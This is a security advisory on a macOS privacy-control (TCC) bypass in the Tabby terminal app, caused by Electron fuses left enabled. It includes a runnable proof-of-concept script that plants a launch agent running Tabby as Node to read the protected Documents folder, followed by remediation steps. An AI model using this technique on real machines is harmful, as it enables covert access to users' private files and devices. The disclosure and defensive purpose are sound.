Tabby TCC Bypass Vulnerability via Misconfigured Electron Fuses
Vulnerability
A TCC (Transparency, Consent, and Control) bypass vulnerability has been identified in Tabby (formerly Terminus) versions prior to 1.0.217. The application ships with several high-risk Electron fuses left enabled, namely RunAsNode, EnableNodeCliInspectArguments and EnableNodeOptionsEnvironmentVariable. Each of these is a code injection vector into the Tabby process: RunAsNode turns the Tabby binary into a plain Node.js runtime whenever the ELECTRON_RUN_AS_NODE environment variable is set, EnableNodeCliInspectArguments accepts --inspect style debugger flags on the command line, and EnableNodeOptionsEnvironmentVariable honours NODE_OPTIONS (for example --require of an attacker-supplied script). Code injected through any of them executes as Tabby and therefore inherits the TCC grants the user has already given the app, so it can reach protected resources such as personal folders, the camera and the microphone without triggering a consent prompt. This is particularly concerning given Tabby's extensive TCC permissions and user base.
Impact
Exploitation allows a local attacker to bypass TCC and reach TCC-protected resources such as personal folders, the camera and the microphone without user consent. The injected code runs in the Node.js context of the Tabby process and inherits every privilege the user has granted Tabby, circumventing macOS's per-application privacy controls. The result is a privacy breach and a path to unauthorized surveillance. The precondition is that the attacker already has code execution as the logged-in user; the bypass escalates that foothold to data which the attacker's own process, or other unprivileged processes such as Terminal, would normally be denied.
Reproduction
To reproduce, download Tabby and inspect its code signature and entitlements with the codesign utility: confirm that the Hardened Runtime flag is set and that no dangerous entitlements (such as com.apple.security.cs.allow-dyld-environment-variables or com.apple.security.cs.disable-library-validation) are present, which rules out the usual dylib injection routes and leaves the Electron fuses as the remaining vector. Next run 'sudo npx @electron/fuses read --app /Applications/Tabby.app' and verify that RunAsNode, EnableNodeCliInspectArguments and EnableNodeOptionsEnvironmentVariable are reported as Enabled. Then write a small test program that lists the Documents folder, which TCC protects, and run it directly from Terminal: unless Terminal itself has been granted access, the listing fails with 'Operation not permitted', which establishes the baseline restriction. Finally, create a launch agent that starts Tabby's main executable with the ELECTRON_RUN_AS_NODE environment variable set to 'true' and an equivalent Node.js script as its argument. Launching through launchd rather than from Terminal matters: TCC attributes file access by a process started from Terminal to Terminal as the responsible process, whereas launchd makes Tabby its own responsible process, so the script runs with Tabby's TCC grants and reads the Documents folder without any prompt.
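The procedure above, written out as a script. This is an added example and not the advisory's or Tabby's own code; it assumes Tabby is installed at /Applications/Tabby.app with its main executable at Contents/MacOS/Tabby, that the @electron/fuses tool prints one "<FuseName> is Enabled|Disabled" line per fuse, and invents the launch agent label and temporary file paths. The last function covers the developer-side fix from the Remediation section.

```shell
#!/bin/sh
# Added example, not code from the advisory or from Tabby. Assumptions: app path,
# executable name, agent label and temp paths below are all illustrative.

APP="${TABBY_APP:-/Applications/Tabby.app}"
LABEL="com.example.tabby-runasnode"              # hypothetical agent label
PAYLOAD="${TMPDIR:-/tmp}/tabby_payload.js"
OUTFILE="${TMPDIR:-/tmp}/tabby_tcc_result.txt"
PLIST="$HOME/Library/LaunchAgents/$LABEL.plist"

# Steps 1-2: signing flags and entitlements, then the fuse report (macOS only).
inspect_app() {
    codesign -dvv --entitlements - "$1" 2>&1     # look for flags=...(runtime)
    npx @electron/fuses read --app "$1"
}

# Filter a fuse report down to the risky fuses that are still Enabled.
# Assumes the tool's "  <FuseName> is Enabled|Disabled" line format.
risky_fuses_enabled() {
    grep -E '^[[:space:]]*(RunAsNode|EnableNodeCliInspectArguments|EnableNodeOptionsEnvironmentVariable) is Enabled$' |
        sed -E 's/^[[:space:]]*//; s/ is Enabled$//'
}

# Step 3: Node script that lists ~/Documents (TCC protected) and records the
# outcome. Under ELECTRON_RUN_AS_NODE argv is [binary, script, args...].
write_payload() {
    cat > "$1" <<'EOF'
const fs = require('fs');
const os = require('os');
const path = require('path');
const target = path.join(os.homedir(), 'Documents');
const out = process.argv[2];
let result;
try {
  result = 'ALLOWED: ' + fs.readdirSync(target).join(', ');
} catch (e) {
  result = 'DENIED: ' + e.code;   // EPERM when TCC blocks the responsible process
}
fs.writeFileSync(out, result + '\n');
EOF
}

# Step 4: launch agent. launchd spawns Tabby as its own responsible process,
# so TCC evaluates Tabby's grants rather than Terminal's.
launch_agent_plist() {
    app="$1"; payload="$2"; outfile="$3"; label="$4"
    cat <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key><string>$label</string>
  <key>ProgramArguments</key>
  <array>
    <string>$app/Contents/MacOS/Tabby</string>
    <string>$payload</string>
    <string>$outfile</string>
  </array>
  <key>EnvironmentVariables</key>
  <dict><key>ELECTRON_RUN_AS_NODE</key><string>true</string></dict>
  <key>RunAtLoad</key><true/>
</dict>
</plist>
EOF
}

# Remediation (developer side): flip the fuses off. Writing fuses modifies the
# binary, so the bundle must be re-signed afterwards with the hardened runtime.
disable_risky_fuses() {
    npx @electron/fuses write --app "$1" \
        RunAsNode=off EnableNodeCliInspectArguments=off EnableNodeOptionsEnvironmentVariable=off
    codesign --force --deep --options runtime --sign "$2" "$1"
}

case "${1:-}" in
  inspect) inspect_app "$APP" | risky_fuses_enabled ;;
  run)
    write_payload "$PAYLOAD"
    launch_agent_plist "$APP" "$PAYLOAD" "$OUTFILE" "$LABEL" > "$PLIST"
    launchctl bootstrap "gui/$(id -u)" "$PLIST"
    sleep 3; cat "$OUTFILE"
    launchctl bootout "gui/$(id -u)/$LABEL" ;;
  fix)     disable_risky_fuses "$APP" "${2:-}" ;;
esac
```

Run `sh repro.sh inspect` first; an empty result means none of the three fuses is enabled and the launch-agent step will not work. `sh repro.sh run` writes the agent, loads it and prints either an ALLOWED line with the Documents listing or DENIED: EPERM. Running the same payload as `node tabby_payload.js` from Terminal gives the Terminal-attributed baseline for comparison. `sh repro.sh fix "<signing identity>"` is the developer-side fuse flip; on a user machine it only helps until the next update replaces the binary.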
Remediation
Users are advised to update Tabby to version 1.0.217 or later. The developer-side fix is to disable the risky fuses (RunAsNode, EnableNodeCliInspectArguments and EnableNodeOptionsEnvironmentVariable) at build time with @electron/fuses and re-sign the bundle, which closes the injection vectors without affecting the application's core functionality; flipping fuses after signing invalidates the signature, so re-signing is not optional. Until the update is installed, reviewing Tabby's grants in the Privacy & Security settings and revoking any that are not needed limits what injected code could reach.
